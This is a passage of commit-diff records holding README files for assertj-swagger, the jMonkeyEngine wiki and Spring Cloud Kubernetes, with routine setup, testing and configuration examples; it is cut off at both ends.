\"\/api\/pet\/findByStatus\", \"\/api\/pet\/findByTags\", \"\/api\/pet\/{petId}\", \"\/api\/store\/order\", \"\/api\/store\/order\/{orderId}\", \"\/api\/user\", \"\/api\/user\/createWithArray\", \"\/api\/user\/createWithList\", \"\/api\/user\/login\", \"\/api\/user\/logout\", \"\/api\/user\/{username}\"]>\nto contain only:\n <[\"\/pets\", \"\/pets\/findByStatus\", \"\/pets\/findByTags\", \"\/pets\/{petId}\", \"\/stores\/order\", \"\/stores\/order\/{orderId}\", \"\/users\", \"\/users\/createWithArray\", \"\/users\/createWithList\", \"\/users\/login\", \"\/users\/logout\", \"\/users\/{username}\"]>\nelements not found:\n <[\"\/pets\/findByTags\", \"\/users\/logout\", \"\/users\", \"\/stores\/order\", \"\/users\/createWithArray\", \"\/pets\", \"\/users\/createWithList\", \"\/pets\/findByStatus\", \"\/pets\/{petId}\", \"\/users\/{username}\", \"\/stores\/order\/{orderId}\", \"\/users\/login\"]>\nand elements not expected:\n <[\"\/api\/store\/order\", \"\/api\/user\", \"\/api\/user\/createWithList\", \"\/api\/pet\", \"\/api\/pet\/findByTags\", \"\/api\/user\/createWithArray\", \"\/api\/user\/login\", \"\/api\/pet\/{petId}\", \"\/api\/store\/order\/{orderId}\", \"\/api\/user\/{username}\", \"\/api\/pet\/findByStatus\", \"\/api\/user\/logout\"]>\n\n2) [Checking properties of definition 'Order'] \nExpecting:\n <[\"complete\", \"id\", \"identifier\", \"petId\", \"quantity\", \"shipDate\", \"status\"]>\nto contain only:\n <[\"id\", \"petId\", \"quantity\", \"shipDate\", \"status\", \"complete\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n\n3) [Checking properties of definition 'User'] \nExpecting:\n <[\"email\", \"firstName\", \"id\", \"identifier\", \"lastName\", \"password\", \"phone\", \"userStatus\", \"username\"]>\nto contain only:\n <[\"id\", \"username\", \"firstName\", \"lastName\", \"email\", \"password\", \"phone\", \"userStatus\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n\n4) [Checking properties of definition 'Pet'] \nExpecting:\n <[\"category\", \"id\", \"identifier\", \"name\", \"photoUrls\", \"status\", \"tags\"]>\nto contain only:\n <[\"id\", \"category\", \"name\", \"photoUrls\", \"tags\", \"status\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n----\n\n=== Using assertj-swagger in an unit test\n\nIf you are using the https:\/\/github.com\/spring-projects\/spring-framework[spring-framework] and https:\/\/github.com\/springfox\/springfox[springfox], Spring's MVC Test framework can also be used to validate the Swagger JSON output against your contract-first Swagger specification.\nThat way you can make sure that the implementation is in compliance with the design specification. \n\n[source, java]\n----\n@Test\npublic void validateThatImplementationFitsDesignSpecification() throws Exception {\n String designFirstSwaggerLocation = Swagger2MarkupTest.class.getResource(\"\/swagger.yaml\").getPath();\n\n MvcResult mvcResult = this.mockMvc.perform(get(\"\/v2\/api-docs\")\n .accept(MediaType.APPLICATION_JSON))\n .andExpect(status().isOk())\n .andReturn();\n\n String springfoxSwaggerJson = mvcResult.getResponse().getContentAsString();\n SwaggerAssertions.assertThat(Swagger20Parser.parse(springfoxSwaggerJson)).isEqualTo(designFirstSwaggerLocation);\n}\n----\n\n== License\n\nCopyright 2015 Robert Winkler\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n","old_contents":"= assertj-swagger\n:author: Robert Winkler\n:version: 0.1.1\n:hardbreaks:\n\nimage:https:\/\/travis-ci.org\/RobWin\/assertj-swagger.svg[\"Build Status\", link=\"https:\/\/travis-ci.org\/RobWin\/assertj-swagger\"] image:https:\/\/coveralls.io\/repos\/RobWin\/assertj-swagger\/badge.svg?branch=master[\"Coverage Status\", link=\"https:\/\/coveralls.io\/r\/RobWin\/assertj-swagger\"] image:https:\/\/api.bintray.com\/packages\/robwin\/maven\/assertj-swagger\/images\/download.svg[link=\"https:\/\/bintray.com\/robwin\/maven\/assertj-swagger\/_latestVersion\"] image:http:\/\/img.shields.io\/badge\/license-ASF2-blue.svg[\"Apache License 2\", link=\"http:\/\/www.apache.org\/licenses\/LICENSE-2.0.txt\"]\n\n== Overview\n\nassertj-swagger is a https:\/\/github.com\/joel-costigliola\/assertj-core[assertj] library which compares a contract-first https:\/\/github.com\/swagger-api\/swagger-spec[Swagger] YAML\/JSON file with a code-first Swagger JSON output (e.g. from https:\/\/github.com\/springfox\/springfox[springfox] or https:\/\/github.com\/swagger-api\/swagger-core\/wiki\/Java-JAXRS-Quickstart[JAX-RS Swagger]). assertj-swagger allows to validate that the API implementation is in compliance with the contract specification. The library supports the Swagger 1.2 and 2.0 specification for the code-first Swagger JSON, but only 2.0 for the contract-first Swagger file.\nassertj-swagger compares Swagger objects like Paths, Parameters and Definitions. It does not compare __unimportant__ Swagger objects like info, descriptions or summaries.\n\n== Usage guide\n\n=== Adding assertj-swagger to your project\nThe project is published in JCenter and Maven Central.\n\n==== Maven\n\n[source,xml]\n----\n<repositories>\n <repository>\n <snapshots>\n <enabled>false<\/enabled>\n <\/snapshots>\n <id>central<\/id>\n <name>bintray<\/name>\n <url>http:\/\/jcenter.bintray.com<\/url>\n <\/repository>\n<\/repositories>\n\n<dependency>\n <groupId>io.github.robwin<\/groupId>\n <artifactId>assertj-swagger<\/artifactId>\n <version>0.1.1<\/version>\n<\/dependency>\n----\n\n==== Gradle\n\n[source,groovy]\n----\nrepositories {\n jcenter()\n}\n\ncompile \"io.github.robwin:assertj-swagger:0.1.1\"\n----\n\n=== Using assertj-swagger in an integration test\n\nUsing assertj-swagger is simple. For example, if you are using https:\/\/github.com\/spring-projects\/spring-boot[Spring Boot] and https:\/\/github.com\/springfox\/springfox[springfox] or https:\/\/github.com\/swagger-api\/swagger-core\/wiki\/Java-JAXRS-Quickstart[JAX-RS Swagger], you can validate your Swagger JSON in an integration test.\n\n[source, java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = Application.class)\n@IntegrationTest\n@WebAppConfiguration\npublic class AssertjSwaggerTest {\n @Test\n public void validateThatImplementationFitsDesignSpecification(){\n String designFirstSwagger = SwaggerAssertTest.class.getResource(\"\/swagger.yaml\").getPath();\n SwaggerAssertions.assertThat(\"http:\/\/localhost:8080\/v2\/api-docs\")\n .isEqualTo(designFirstSwagger);\n }\n}\n----\n\n==== Example output\n\n[source]\n----\nThe following 4 assertions failed:\n1) [Checking Paths] \nExpecting:\n <[\"\/api\/pet\", \"\/api\/pet\/findByStatus\", \"\/api\/pet\/findByTags\", \"\/api\/pet\/{petId}\", \"\/api\/store\/order\", \"\/api\/store\/order\/{orderId}\", \"\/api\/user\", \"\/api\/user\/createWithArray\", \"\/api\/user\/createWithList\", \"\/api\/user\/login\", \"\/api\/user\/logout\", \"\/api\/user\/{username}\"]>\nto contain only:\n <[\"\/pets\", \"\/pets\/findByStatus\", \"\/pets\/findByTags\", \"\/pets\/{petId}\", \"\/stores\/order\", \"\/stores\/order\/{orderId}\", \"\/users\", \"\/users\/createWithArray\", \"\/users\/createWithList\", \"\/users\/login\", \"\/users\/logout\", \"\/users\/{username}\"]>\nelements not found:\n <[\"\/pets\/findByTags\", \"\/users\/logout\", \"\/users\", \"\/stores\/order\", \"\/users\/createWithArray\", \"\/pets\", \"\/users\/createWithList\", \"\/pets\/findByStatus\", \"\/pets\/{petId}\", \"\/users\/{username}\", \"\/stores\/order\/{orderId}\", \"\/users\/login\"]>\nand elements not expected:\n <[\"\/api\/store\/order\", \"\/api\/user\", \"\/api\/user\/createWithList\", \"\/api\/pet\", \"\/api\/pet\/findByTags\", \"\/api\/user\/createWithArray\", \"\/api\/user\/login\", \"\/api\/pet\/{petId}\", \"\/api\/store\/order\/{orderId}\", \"\/api\/user\/{username}\", \"\/api\/pet\/findByStatus\", \"\/api\/user\/logout\"]>\n\n2) [Checking properties of definition 'Order'] \nExpecting:\n <[\"complete\", \"id\", \"identifier\", \"petId\", \"quantity\", \"shipDate\", \"status\"]>\nto contain only:\n <[\"id\", \"petId\", \"quantity\", \"shipDate\", \"status\", \"complete\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n\n3) [Checking properties of definition 'User'] \nExpecting:\n <[\"email\", \"firstName\", \"id\", \"identifier\", \"lastName\", \"password\", \"phone\", \"userStatus\", \"username\"]>\nto contain only:\n <[\"id\", \"username\", \"firstName\", \"lastName\", \"email\", \"password\", \"phone\", \"userStatus\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n\n4) [Checking properties of definition 'Pet'] \nExpecting:\n <[\"category\", \"id\", \"identifier\", \"name\", \"photoUrls\", \"status\", \"tags\"]>\nto contain only:\n <[\"id\", \"category\", \"name\", \"photoUrls\", \"tags\", \"status\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n----\n\n=== Using assertj-swagger in an unit test\n\nIf you are using the https:\/\/github.com\/spring-projects\/spring-framework[spring-framework] and https:\/\/github.com\/springfox\/springfox[springfox], Spring's MVC Test framework can also be used to validate the Swagger JSON output against your contract-first Swagger specification.\nThat way you can make sure that the implementation is in compliance with the design specification. \n\n[source, java]\n----\n@Test\npublic void validateThatImplementationFitsDesignSpecification() throws Exception {\n String designFirstSwaggerLocation = Swagger2MarkupTest.class.getResource(\"\/swagger.yaml\").getPath();\n\n MvcResult mvcResult = this.mockMvc.perform(get(\"\/v2\/api-docs\")\n .accept(MediaType.APPLICATION_JSON))\n .andExpect(status().isOk())\n .andReturn();\n\n String springfoxSwaggerJson = mvcResult.getResponse().getContentAsString();\n SwaggerAssertions.assertThat(Swagger20Parser.parse(springfoxSwaggerJson)).isEqualTo(designFirstSwaggerLocation);\n}\n----\n\n== License\n\nCopyright 2015 Robert Winkler\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9a74cec0d61f391adf22996b1d56b726409f6f9","subject":"Test commit #3","message":"Test commit #3","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"README.adoc","new_file":"README.adoc","new_contents":":experimental:\n\nimage:https:\/\/travis-ci.org\/jMonkeyEngine\/wiki.svg?branch=master[\"Build Status\", link=\"https:\/\/travis-ci.org\/jMonkeyEngine\/wiki\"]\n\n= jMonkeyEngine Documentation\n\nsee link:https:\/\/jmonkeyengine.github.io\/wiki\/documentation[https:\/\/jmonkeyengine.github.io\/wiki\/documentation]\n\nThe project to store, edit, and generate the documentation of http:\/\/jmonkeyengine.org[jMonkeyEngine].\n\nThe documentation (<<src\/docs\/asciidoc>>) is editable :\n\n* online via github (Edit button located at top of the Wiki page + Pull Request)\n* offline with Netbeans after local `git clone` + open\n* offline with Atom editor, see link:https:\/\/jmonkeyengine.github.io\/wiki\/wiki\/atom_editor.html[Atom Editor for Wiki Editing]\n\n.Prerequisites\n. Have a link:https:\/\/github.com\/[GitHub account].\n. Optional: Are a Wiki project member.\n\nIf you are not a member, you can fork the repository into your GitHub account and issue pull requests from there or\nonline via github. (Edit button located at top of the Wiki page + Pull Request)\n\nTo fork the Wiki repository into your GitHub Account:\n\n* In the menu at the top of the page, select the *Fork* button.\n\nThe syntax is asciidoc :\n\n* link:http:\/\/asciidoctor.org\/docs\/asciidoc-syntax-quick-reference\/[Asciidoc Syntax Quick Reference]\n* link:http:\/\/asciidoctor.org\/docs\/user-manual\/#introduction-to-asciidoctor[Asciidoctor User Manual]\n\nAn easy to use primer for GitHub commands can be found here:\n\n* link:http:\/\/rogerdudler.github.io\/git-guide\/[git - the simple guide]\n\n== Contribute\n\nThere are a few simple rules to follow when contributing.\n\n. It's not required but it's a good idea to give a heads up you made a P\/R on the link:https:\/\/hub.jmonkeyengine.org\/[jMonkeyEngine Forum] under the `Documentation` topic.\n. When adding documents, make sure to always complete the header of your document first.\n** see link:https:\/\/jmonkeyengine.github.io\/wiki\/wiki\/wiki_header.html[Anatomy of a Wiki Header]\n. When linking to other Wiki pages, always use an \"`Inter-Document Cross Reference`\" with the format,\n** ++<<path\/to\/wiki\/page#,custom label text>>++ +\nThe `#` sign substitutes for the file extension. This type of link will first look for the `.adoc` file and if not found default to the `.html` version.\n+\nThe path should be relative to the `asciidoc` folder.\n+\nFor example: `++<<jme3\/requirements#,Software and hardware requirements>>++` +\nlinks to the `requirements.adoc` page, which lives in a sub-folder of `asciidoc` named `jme3`.\n+\nSee link:http:\/\/asciidoctor.org\/docs\/user-manual\/#inter-document-cross-references[http:\/\/asciidoctor.org\/docs\/user-manual\/#inter-document-cross-references] for more info.\n. When linking to images stored in the wiki repository, always use an image prefix in front of the file name and square brackets after it with the format,\n** Image on its own line - `image::path\/to\/image.jpg[image alt text,width=\" \",height=\" \", align=\" \"]`\n+\nFor example: `++image::jme3\/beginner\/beginner-assets-models.png[beginner-assets-models.png,320,250,align=\"center\"]++`\n+\n* This image is on its own line.\n* Is stored in the `jme3\/beginner` folder which lives in the `images` folder.\n* Is named `beginner-assets-models.png`.\n* Has a `alt text` name of `beginner-assets-models.png`.\n* Has a width of 320.\n* Has a height of 250.\n* Is aligned in the center of the page.\n** If you want to include an image inline, use the `image:` prefix instead (notice there is only one colon):\n+\nSee link:http:\/\/asciidoctor.org\/docs\/user-manual\/#images[http:\/\/asciidoctor.org\/docs\/user-manual\/#images] for in depth instructions.\n\n\n== Build\n\n* In Netbeans, convert the AsciiDoc to HTML5 by invoking the 'asciidoctor' goal:\n+\n[source]\n----\n $ .\/gradlew asciidoctor\n----\n+\nOpen the file _build\/asciidoc\/html5\/index.html_ in your browser to see the generated HTML file.\n\n* In Atom, you see real time changes when using the `AsciiDoc Preview` (kbd:[ctrl]+kbd:[shift]+kbd:[A] or `menu:Packages[AsciiDoc Preview>Toggle Preview]`). No build is required.\n\n== TODO\n\n- [x] configure travis build\n- [x] configure github + gradle + travis to publish on gh-pages branches\n- [x] find and fixe conversion bug\n- [x] complete conversion: note, warning, ...\n- [x] fix warning during html's generation (should be fixed manually)\n- [x] add meta info during conversion (doctitle, revision, tags, ...)\n- [x] add a home page (index.html)\n- [ ] add a navigation bar or a menu (?)\n- [ ] customize html layout (header, footer, css)\n- [x] transfer ownership to jMonkeyEngine org\n- [x] complete Doc, how to contribute,...\n- [ ] accept Pull Request\n- [ ] write a post about the migration (the tools, why asciidoc, vs alternatives, how ...)\n- [ ] generate sitemap\n- [x] add search box\n- [ ] add google analytics (?)\n- [ ] support emoji\n- [ ] support iframe block\n- [x] fix slideshow of \"Xxx for Dummies\"\n- [ ] optimize remove useless images\n- [ ] optimize image, use smaller file, eg convert to jpg or to webp, resize\n- [ ] organize i18n \/ lang\n- [ ] use tags to create taxonomy\n","old_contents":":experimental:\n\nimage:https:\/\/travis-ci.org\/jMonkeyEngine\/wiki.svg?branch=master[\"Build Status\", link=\"https:\/\/travis-ci.org\/jMonkeyEngine\/wiki\"]\n\n= jMonkeyEngine Documentation\n\nsee link:https:\/\/jmonkeyengine.github.io\/wiki\/documentation[https:\/\/jmonkeyengine.github.io\/wiki\/documentation]\n\nThe project to store, edit, and generate the documentation of http:\/\/jmonkeyengine.org[jMonkeyEngine].\n\nThe documentation (<<src\/docs\/asciidoc>>) is editable :\n\n* online via github (Edit button located at top of the Wiki page + Pull Request)\n* offline with Netbeans after local `git clone` + open\n* offline with Atom editor, see link:https:\/\/jmonkeyengine.github.io\/wiki\/wiki\/atom_editor.html[Atom Editor for Wiki Editing]\n\n.Prerequisites\n. Have a link:https:\/\/github.com\/[GitHub account].\n. Optional: Are a Wiki project member.\n\nIf you are not a member, you can fork the repository into your GitHub account and issue pull requests from there or\nonline via github. (Edit button located at top of the Wiki page + Pull Request)\n\nTo fork the Wiki repository into your GitHub Account:\n\n* In the menu at the top of the page, select the *Fork* button.\n\nThe syntax is asciidoc :\n\n* link:http:\/\/asciidoctor.org\/docs\/asciidoc-syntax-quick-reference\/[Asciidoc Syntax Quick Reference]\n* link:http:\/\/asciidoctor.org\/docs\/user-manual\/#introduction-to-asciidoctor[Asciidoctor User Manual]\n\nAn easy to use primer for GitHub commands can be found here:\n\n* link:http:\/\/rogerdudler.github.io\/git-guide\/[git - the simple guide]\n\n\n== Contribute\n\nThere are a few simple rules to follow when contributing.\n\n. It's not required but it's a good idea to give a heads up you made a P\/R on the link:https:\/\/hub.jmonkeyengine.org\/[jMonkeyEngine Forum] under the `Documentation` topic.\n. When adding documents, make sure to always complete the header of your document first.\n** see link:https:\/\/jmonkeyengine.github.io\/wiki\/wiki\/wiki_header.html[Anatomy of a Wiki Header]\n. When linking to other Wiki pages, always use an \"`Inter-Document Cross Reference`\" with the format,\n** ++<<path\/to\/wiki\/page#,custom label text>>++ +\nThe `#` sign substitutes for the file extension. This type of link will first look for the `.adoc` file and if not found default to the `.html` version.\n+\nThe path should be relative to the `asciidoc` folder.\n+\nFor example: `++<<jme3\/requirements#,Software and hardware requirements>>++` +\nlinks to the `requirements.adoc` page, which lives in a sub-folder of `asciidoc` named `jme3`.\n+\nSee link:http:\/\/asciidoctor.org\/docs\/user-manual\/#inter-document-cross-references[http:\/\/asciidoctor.org\/docs\/user-manual\/#inter-document-cross-references] for more info.\n. When linking to images stored in the wiki repository, always use an image prefix in front of the file name and square brackets after it with the format,\n** Image on its own line - `image::path\/to\/image.jpg[image alt text,width=\" \",height=\" \", align=\" \"]`\n+\nFor example: `++image::jme3\/beginner\/beginner-assets-models.png[beginner-assets-models.png,320,250,align=\"center\"]++`\n+\n* This image is on its own line.\n* Is stored in the `jme3\/beginner` folder which lives in the `images` folder.\n* Is named `beginner-assets-models.png`.\n* Has a `alt text` name of `beginner-assets-models.png`.\n* Has a width of 320.\n* Has a height of 250.\n* Is aligned in the center of the page.\n** If you want to include an image inline, use the `image:` prefix instead (notice there is only one colon):\n+\nSee link:http:\/\/asciidoctor.org\/docs\/user-manual\/#images[http:\/\/asciidoctor.org\/docs\/user-manual\/#images] for in depth instructions.\n\n\n== Build\n\n* In Netbeans, convert the AsciiDoc to HTML5 by invoking the 'asciidoctor' goal:\n+\n[source]\n----\n $ .\/gradlew asciidoctor\n----\n+\nOpen the file _build\/asciidoc\/html5\/index.html_ in your browser to see the generated HTML file.\n\n* In Atom, you see real time changes when using the `AsciiDoc Preview` (kbd:[ctrl]+kbd:[shift]+kbd:[A] or `menu:Packages[AsciiDoc Preview>Toggle Preview]`). No build is required.\n\n== TODO\n\n- [x] configure travis build\n- [x] configure github + gradle + travis to publish on gh-pages branches\n- [x] find and fixe conversion bug\n- [x] complete conversion: note, warning, ...\n- [x] fix warning during html's generation (should be fixed manually)\n- [x] add meta info during conversion (doctitle, revision, tags, ...)\n- [x] add a home page (index.html)\n- [ ] add a navigation bar or a menu (?)\n- [ ] customize html layout (header, footer, css)\n- [x] transfer ownership to jMonkeyEngine org\n- [x] complete Doc, how to contribute,...\n- [ ] accept Pull Request\n- [ ] write a post about the migration (the tools, why asciidoc, vs alternatives, how ...)\n- [ ] generate sitemap\n- [x] add search box\n- [ ] add google analytics (?)\n- [ ] support emoji\n- [ ] support iframe block\n- [x] fix slideshow of \"Xxx for Dummies\"\n- [ ] optimize remove useless images\n- [ ] optimize image, use smaller file, eg convert to jpg or to webp, resize\n- [ ] organize i18n \/ lang\n- [ ] use tags to create taxonomy\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"d71eaffcb9cf33b661af9e9ed0019bcb379f9194","subject":"Bumping versions","message":"Bumping versions","repos":"spring-cloud-incubator\/spring-cloud-kubernetes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/\/\/\nDO NOT EDIT THIS FILE. IT WAS GENERATED.\nManual changes to this file will be lost when it is generated again.\nEdit the files in the src\/main\/asciidoc\/ directory instead.\n\/\/\/\/\n\n\n= Spring Cloud Kubernetes\n:doctype: book\n:idprefix:\n:idseparator: -\n:toc: left\n:toclevels: 4\n:tabsize: 4\n:numbered:\n:sectanchors:\n:sectnums:\n:icons: font\n:hide-uri-scheme:\n:docinfo: shared,private\n\n:sc-ext: java\n:project-full-name: Spring Cloud Kubernetes\n:all: {asterisk}{asterisk}\n\nThis reference guide covers how to use Spring Cloud Kubernetes.\n\n== Why do you need Spring Cloud Kubernetes?\n\nSpring Cloud Kubernetes provides implementations of well known Spring Cloud interfaces allowing developers to build and run Spring Cloud applications on Kubernetes. While this project may be useful to you when building a cloud native application, it is also not a requirement in order to deploy a Spring Boot app on Kubernetes. If you are just getting started in your journey to running your Spring Boot app on Kubernetes you can accomplish a lot with nothing more than a basic Spring Boot app and Kubernetes itself. To learn more, you can get started by reading the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#cloud-deployment-kubernetes[Spring Boot reference documentation for deploying to Kubernetes ] and also working through the workshop material https:\/\/hackmd.io\/@ryanjbaxter\/spring-on-k8s-workshop[Spring and Kubernetes].\n\n== Starters\n\nStarters are convenient dependency descriptors you can include in your\napplication. Include a starter to get the dependencies and Spring Boot\nauto-configuration for a feature set.\n\n[cols=\"a,d\"]\n|===\n| Starter | Features\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes<\/artifactId>\n<\/dependency>\n----\n| <<DiscoveryClient for Kubernetes,Discovery Client>> implementation that\nresolves service names to Kubernetes Services.\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-config<\/artifactId>\n<\/dependency>\n----\n| Load application properties from Kubernetes\n<<configmap-propertysource,ConfigMaps>> and <<Secrets PropertySource,Secrets>>.\n<<propertysource-reload,Reload>> application properties when a ConfigMap or\nSecret changes.\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-all<\/artifactId>\n<\/dependency>\n----\n| All Spring Cloud Kubernetes features.\n\n|===\n\n== DiscoveryClient for Kubernetes\n\nThis project provides an implementation of https:\/\/github.com\/spring-cloud\/spring-cloud-commons\/blob\/master\/spring-cloud-commons\/src\/main\/java\/org\/springframework\/cloud\/client\/discovery\/DiscoveryClient.java[Discovery Client]\nfor https:\/\/kubernetes.io[Kubernetes].\nThis client lets you query Kubernetes endpoints (see https:\/\/kubernetes.io\/docs\/user-guide\/services\/[services]) by name.\nA service is typically exposed by the Kubernetes API server as a collection of endpoints that represent `http` and `https` addresses and that a client can\naccess from a Spring Boot application running as a pod.\n\nThis is something that you get for free by adding the following dependency inside your project:\n\n====\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable loading of the `DiscoveryClient`, add `@EnableDiscoveryClient` to the according configuration or application class, as the following example shows:\n\n====\n[source,java]\n----\n@SpringBootApplication\n@EnableDiscoveryClient\npublic class Application {\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n}\n----\n====\n\nThen you can inject the client in your code simply by autowiring it, as the following example shows:\n\n====\n[source,java]\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n----\n====\n\nYou can choose to enable `DiscoveryClient` from all namespaces by setting the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nIf, for any reason, you need to disable the `DiscoveryClient`, you can set the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.enabled=false\n----\n====\n\nSome Spring Cloud components use the `DiscoveryClient` in order to obtain information about the local service instance. For\nthis to work, you need to align the Kubernetes service name with the `spring.application.name` property.\n\nNOTE: `spring.application.name` has no effect as far as the name registered for the application within Kubernetes\n\nSpring Cloud Kubernetes can also watch the Kubernetes service catalog for changes and update the\n`DiscoveryClient` implementation accordingly. In order to enable this functionality you need to add\n`@EnableScheduling` on a configuration class in your application.\n\n== Kubernetes native service discovery\n\nKubernetes itself is capable of (server side) service discovery (see: https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/#discovering-services).\nUsing native kubernetes service discovery ensures compatibility with additional tooling, such as Istio (https:\/\/istio.io), a service mesh that is capable of load balancing, circuit breaker, failover, and much more.\n\nThe caller service then need only refer to names resolvable in a particular Kubernetes cluster. A simple implementation might use a spring `RestTemplate` that refers to a fully qualified domain name (FQDN), such as `https:\/\/{service-name}.{namespace}.svc.{cluster}.local:{service-port}`.\n\nAdditionally, you can use Hystrix for:\n\n* Circuit breaker implementation on the caller side, by annotating the spring boot application class with `@EnableCircuitBreaker`\n* Fallback functionality, by annotating the respective method with `@HystrixCommand(fallbackMethod=`\n\n== Kubernetes PropertySource implementations\n\nThe most common approach to configuring your Spring Boot application is to create an `application.properties` or `application.yaml` or\nan `application-profile.properties` or `application-profile.yaml` file that contains key-value pairs that provide customization values to your\napplication or Spring Boot starters. You can override these properties by specifying system properties or environment\nvariables.\n\n[[configmap-propertysource]]\n=== Using a `ConfigMap` `PropertySource`\n\nKubernetes provides a resource named https:\/\/kubernetes.io\/docs\/user-guide\/configmap\/[`ConfigMap`] to externalize the\nparameters to pass to your application in the form of key-value pairs or embedded `application.properties` or `application.yaml` files.\nThe link:https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-fabric8-config[Spring Cloud Kubernetes Config] project makes Kubernetes `ConfigMap` instances available\nduring application bootstrapping and triggers hot reloading of beans or Spring context when changes are detected on\nobserved `ConfigMap` instances.\n\nThe default behavior is to create a `Fabric8ConfigMapPropertySource` based on a Kubernetes `ConfigMap` that has a `metadata.name` value of either the name of\nyour Spring application (as defined by its `spring.application.name` property) or a custom name defined within the\n`bootstrap.properties` file under the following key: `spring.cloud.kubernetes.config.name`.\n\nHowever, more advanced configuration is possible where you can use multiple `ConfigMap` instances.\nThe `spring.cloud.kubernetes.config.sources` list makes this possible.\nFor example, you could define the following `ConfigMap` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a ConfigMap named c1 in namespace default-namespace\n - name: c1\n # Spring Cloud Kubernetes looks up a ConfigMap named default-name in whatever namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a ConfigMap named c3 in namespace n3\n - namespace: n3\n name: c3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.config.namespace` had not been set,\nthe `ConfigMap` named `c1` would be looked up in the namespace that the application runs.\n\nAny matching `ConfigMap` that is found is processed as follows:\n\n* Apply individual configuration properties.\n* Apply as `yaml` the content of any property named `application.yaml`.\n* Apply as a properties file the content of any property named `application.properties`.\n\nThe single exception to the aforementioned flow is when the `ConfigMap` contains a *single* key that indicates\nthe file is a YAML or properties file. In that case, the name of the key does NOT have to be `application.yaml` or\n`application.properties` (it can be anything) and the value of the property is treated correctly.\nThis features facilitates the use case where the `ConfigMap` was created by using something like the following:\n\n====\n[source]\n----\nkubectl create configmap game-config --from-file=\/path\/to\/app-config.yaml\n----\n====\n\nAssume that we have a Spring Boot application named `demo` that uses the following properties to read its thread pool\nconfiguration.\n\n* `pool.size.core`\n* `pool.size.maximum`\n\nThis can be externalized to config map in `yaml` format as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n pool.size.core: 1\n pool.size.max: 16\n----\n====\n\nIndividual properties work fine for most cases. However, sometimes, embedded `yaml` is more convenient. In this case, we\nuse a single property named `application.yaml` to embed our `yaml`, as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yaml: |-\n pool:\n size:\n core: 1\n max:16\n----\n====\n\nThe following example also works:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n custom-name.yaml: |-\n pool:\n size:\n core: 1\n max:16\n----\n====\n\nYou can also configure Spring Boot applications differently depending on active profiles that are merged together\nwhen the `ConfigMap` is read. You can provide different property values for different profiles by using an\n`application.properties` or `application.yaml` property, specifying profile-specific values, each in their own document\n(indicated by the `---` sequence), as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n ---\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n ---\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n----\n====\n\nIn the preceding case, the configuration loaded into your Spring Application with the `development` profile is as follows:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n\nHowever, if the `production` profile is active, the configuration becomes:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello 